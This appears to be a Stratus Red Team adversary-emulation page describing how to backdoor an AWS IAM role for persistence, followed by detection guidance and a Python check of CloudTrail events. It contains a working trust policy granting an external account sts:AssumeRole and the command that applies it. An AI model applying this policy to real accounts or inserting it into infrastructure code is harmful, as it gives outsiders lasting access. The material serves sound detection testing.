Backdoor an IAM Role

idempotent

Platform: AWS

MITRE ATT&CK Tactics

  • Persistence

Description

Establishes persistence by backdooring an existing IAM role, allowing it to be assumed from an external AWS account.

Warm-up:

  • Create an IAM role.

Detonation:

  • Update the assume role policy of the IAM role to backdoor it, making it accessible from an external, fictitious AWS account:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Service": "ec2.amazonaws.com"
      },
      "Action": "sts:AssumeRole"
    },
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::193672423079:root"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

Instructions

Detonate with Stratus Red Team
stratus detonate aws.persistence.iam-backdoor-role

Detection

  • Using CloudTrail's UpdateAssumeRolePolicy event.

  • Through IAM Access Analyzer, which generates a finding when a role can be assumed from a new AWS account or publicly.
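The CloudTrail detection above can be turned into a concrete check: parse the `policyDocument` carried in an `UpdateAssumeRolePolicy` event and report every AWS principal that belongs to an account outside an allowlist. This is an added example, not part of Stratus Red Team; the CloudTrail record, the role name and the trusted-account set are constructed for illustration.

```python
import json

# Constructed CloudTrail record (not real data) for the UpdateAssumeRolePolicy
# call this technique performs; the policy mirrors the one shown above.
SAMPLE_EVENT = {
    "eventName": "UpdateAssumeRolePolicy",
    "recipientAccountId": "111111111111",
    "requestParameters": {
        "roleName": "example-backdoored-role",  # constructed name
        "policyDocument": json.dumps({
            "Version": "2012-10-17",
            "Statement": [
                {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"},
                 "Action": "sts:AssumeRole"},
                {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::193672423079:root"},
                 "Action": "sts:AssumeRole"},
            ],
        }),
    },
}


def _aws_principals(statement):
    """Yield the AWS principal entries of a statement: "*", an ARN or a bare account ID."""
    principal = statement.get("Principal", {})
    if principal == "*":
        yield "*"
        return
    aws = principal.get("AWS", [])
    yield from ([aws] if isinstance(aws, str) else aws)


def external_trusted_accounts(event, trusted_accounts):
    """Return principals in the new trust policy whose account is not in trusted_accounts.

    trusted_accounts is assumed to hold the role's own account plus any
    account that legitimately assumes roles in it; "*" (public) is always reported.
    """
    if event.get("eventName") != "UpdateAssumeRolePolicy":
        return []
    policy = json.loads(event["requestParameters"]["policyDocument"])
    findings = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        for entry in _aws_principals(stmt):
            # ARN form is arn:aws:iam::<account-id>:root; a bare 12-digit ID is also valid
            account = entry.split(":")[4] if entry.startswith("arn:") else entry
            if account not in trusted_accounts:
                findings.append(account)
    return findings
```

Feeding real CloudTrail records through this check on each `UpdateAssumeRolePolicy` event flags the external account the technique adds, while a policy that only trusts your own accounts produces no finding.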